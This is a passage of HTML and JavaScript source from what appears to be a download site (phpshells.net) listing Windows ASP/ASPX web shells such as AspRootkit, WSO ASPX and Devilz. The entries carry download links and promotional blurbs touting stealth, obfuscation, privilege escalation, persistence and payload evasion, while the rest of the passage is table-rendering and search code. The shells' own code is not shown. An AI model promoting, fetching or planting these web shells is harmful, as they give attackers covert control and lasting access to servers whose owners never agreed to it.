by BloodSword – Windows ASP Rootkit Shell</h3><p><b>AspRootkit 1.0</b> delivers advanced privilege escalation and rootkit features on Windows servers. Its persistence mechanisms make it a unique tool in Windows redteam engagements. </p><ul><li>Privilege escalation modules and persistent access</li><li>Works on classic ASP environments</li><li>Rare underground legacy tool</li></ul><p><b>Keywords:</b> asprootkit, asp shell, windows rootkit, privilege escalation, redteam, phpshells.net </p> ` }, { name: 'Wso Web Shell Aspx', tags: ['aspx','web shell','wso','windows'], raw: 'https://phpshells.net/shells/wso-aspx.txt', download: 'https://phpshells.net/shells/wso-aspx.zip', desc: 'The ASPX edition of the legendary WSO shell. Fully compatible with modern Windows hosting, stealth ops and web control. Collected for cyber research at phpshells.net.', article: ` <h3>WSO Web Shell ASPX – Windows/ASPX Edition</h3><p><b>WSO ASPX Shell</b> brings the iconic WSO experience to ASPX environments, supporting stealth operations, robust web file management and full Windows hosting compatibility. </p><ul><li>Command execution and file manager for ASPX/Windows</li><li>Obfuscated and password-protected UI</li></ul><p><b>Keywords:</b> wso aspx shell, aspx web shell, windows shell, webshell archive, phpshells.net </p> ` }, { name: 'Devilz Shell Aspx', tags: ['aspx','web shell','bypass','c#'], raw: 'https://phpshells.net/shells/devilz.txt', download: 'https://phpshells.net/shells/devilz.zip', desc: 'Devilz Shell ASPX delivers rapid, covert control for .NET targets. Curated at phpshells.net for pentesters needing deep server interaction and C# payload evasion.', article: ` <h3>Devilz Shell ASPX – C# Covert Web Shell</h3><p><b>Devilz Shell</b> is crafted for penetration testers and redteamers targeting .NET and ASPX environments. Features encoded C# payloads and stealth routines. </p><ul><li>Stealth web control and encoded command payloads</li><li>Full support for ASPX/Windows .NET hosting</li></ul><p><b>Keywords:</b> devilz shell, aspx shell, c# shell, covert web shell, windows bypass, phpshells.net </p> ` }]; function renderShells(filter='') { const tbody = document.getElementById('shellTableBody'); tbody.innerHTML = ''; let filtered = shellData; if (filter) { const q = filter.toLowerCase(); filtered = shellData.filter(shell => shell.name.toLowerCase().includes(q) || shell.desc.toLowerCase().includes(q) || (shell.tags && shell.tags.join(',').toLowerCase().includes(q)) ); } filtered.forEach((shell, idx) => { const tr = document.createElement('tr'); tr.innerHTML = ` <td><span class="badge" title="${shell.name}">${shell.name}</span></td><td>${(shell.tags||[]).map(t=>`<span class="badge">${t}</span>`).join('')}</td><td style="text-align:right"><div class="actions"><a href="${shell.raw}" target="_blank" class="action-btn" rel="nofollow">txt</a><a href="${shell.download}" class="action-btn" download>zip</a><button class="action-btn" onclick="toggleArticle(${idx})" id="btn-${idx}">details</button></div></td> `; tbody.appendChild(tr); const art = document.createElement('tr'); art.className = "shell-article-row"; art.style.display = "none"; art.innerHTML = `<td colspan="4"><div class="shell-article">${shell.article||""}</div></td>`; tbody.appendChild(art); });} function toggleArticle(idx) { const tbody = document.getElementById('shellTableBody'); const trs = tbody.querySelectorAll('tr'); const mainRow = idx * 2; const articleRow = mainRow + 1; const row = trs[articleRow]; if(row.style.display === "none") { row.style.display = ""; document.getElementById('btn-' + idx).textContent = "Hide"; } else { row.style.display = "none"; document.getElementById('btn-' + idx).textContent = "Details"; }}renderShells();document.getElementById('searchbar').addEventListener('input', e => { renderShells(e.target.value);});</script></body></html>
